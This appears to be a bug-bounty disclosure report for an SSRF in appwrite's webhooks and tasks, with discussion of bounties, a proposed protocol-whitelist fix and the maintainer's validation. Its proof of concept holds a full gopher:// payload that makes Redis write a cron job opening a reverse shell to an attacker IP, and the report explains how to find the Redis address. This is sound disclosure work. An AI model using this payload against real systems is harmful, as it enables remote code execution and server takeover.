Server-Side Request Forgery (SSRF) in appwrite/appwrite

Valid

Reported on

Oct 3rd 2021


Description

An authenticated SSRF vulnerability exists in appwrite's webhooks / tasks feature. The gopher:// protocol can be used to cause code execution on the Redis server that comes along with appwrite. The attacker must know the IP address of the redis-server which can be done by creating multiple webhooks in the 172..0. range.

Proof of Concept

Use the following payload as a webhook:  

gopher://[REDIS-SERVER-IP]:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2463%0D%0A%0A%0A%2A/1%20%2A%20%2A%20%2A%20%2A%20bash%20-c%20%22sh%20-i%20%3E%26%20/dev/tcp/10.0.2.4/1234%200%3E%261%22%0A%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%245%0D%0A/data%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%244%0D%0Aroot%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A 

When webhook is triggered:

This causes the following to be written in /data/root of the redis server:

*/1 * * * * bash -c "sh -i >& /dev/tcp/10.0.2.4/1234 0>&1

Impact

As of writing, I am only able to execute Redis commands and cause arbitrary file writes on the Redis server.

Recommended Fix

Block the gopher:// protocol

Occurrences

No protocol validation (Update task)

No protocol validation (Update webhook)

No protocol validation (Create webhook)

No protocol validation (Create task)

haxatron modified the report
a year ago
haxatron modified the report
a year ago
haxatron modified the report
a year ago
haxatron
a year ago

Researcher


Hi @admin the email in in the security.md repository. Also I think there's a bug with the disclosure bounty

We have contacted a member of the appwrite team and are waiting to hear back a year ago
Jamie Slome
a year ago

Admin


@haxatron - could you explain what the issue is with the bounty?

haxatron
a year ago

Researcher


Originally it was 212.5 but when I updated the report it is 187.5. I think there may be some error in calculation when the report reaches the limit

Jamie Slome
a year ago

Admin


@haxatron - we have identified the bug and will work on resolving this as soon as possible. In the meantime, I have bumped 👊 your bounties back up again.

haxatron
a year ago

Researcher


Fixes proposed: https://github.com/Haxatron/appwrite/commit/682198c14849105c2dcedf7fd93aeca259efe350

haxatron
a year ago

Researcher


@admin I can't seem to select the correct branch for the fix above. The security-fix branch does not show up for me

Jamie Slome
a year ago

Admin


@haxatron - thanks for the heads up here! We do not currently have pagination of branches on the dropdown, and so will get this sorted out today for you! Once this has been deployed, you will be able to select your branch. I will keep you notified here! 🎊

haxatron
a year ago

Researcher


Thanks! I am a noob at GitHub lol. So this is my first time hearing about pagination.

haxatron
a year ago

Researcher


Oops i now think you meant that there are too many branches and so huntr cannot load them all. In that case, ill modify the fix in alphabetical order and that way I can select it.

Jamie Slome
a year ago

Admin


The fix is deploying now, which will allow you to select any branch. Currently, some are just missing.

haxatron submitted a
a year ago
We have sent a third and final follow up to the appwrite team. This report is now considered stale. a year ago
haxatron modified the report
10 months ago
haxatron
10 months ago

Researcher


Use the following payload as a webhook:

gopher://[REDIS-SERVER-IP]:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2463%0D%0A%0A%0AWRITTEN%0A%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%245%0D%0A/data%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%244%0D%0Aroot%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A 

When webhook is triggered:

This causes the following to be written in /data/root file of the redis server:

WRITTEN
haxatron
10 months ago

Researcher


From my understanding of the project, Appwrite requires HTTP requests to be made to internal IP address ranges, hence the submitted patch fix only validates the protocol used for webhooks / tasks against a whitelist (http, https).

haxatron
10 months ago

Researcher


To prevent any interaction with the redis-server via the gopher protocol

Jake Barnby modified the Severity from High (7.2) to Low (3.5) a month ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Jake Barnby validated this vulnerability a month ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Jake Barnby confirmed that a fix has been merged on 870407 a month ago
The fix bounty has been dropped
projects.php#L637-L698 has been validated
projects.php#L1053-L1132 has been validated
projects.php#L764-L816 has been validated
projects.php#L1199-L1266 has been validated
Jake Barnby gave praise a month ago
Thank you for the report!
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
to join this conversation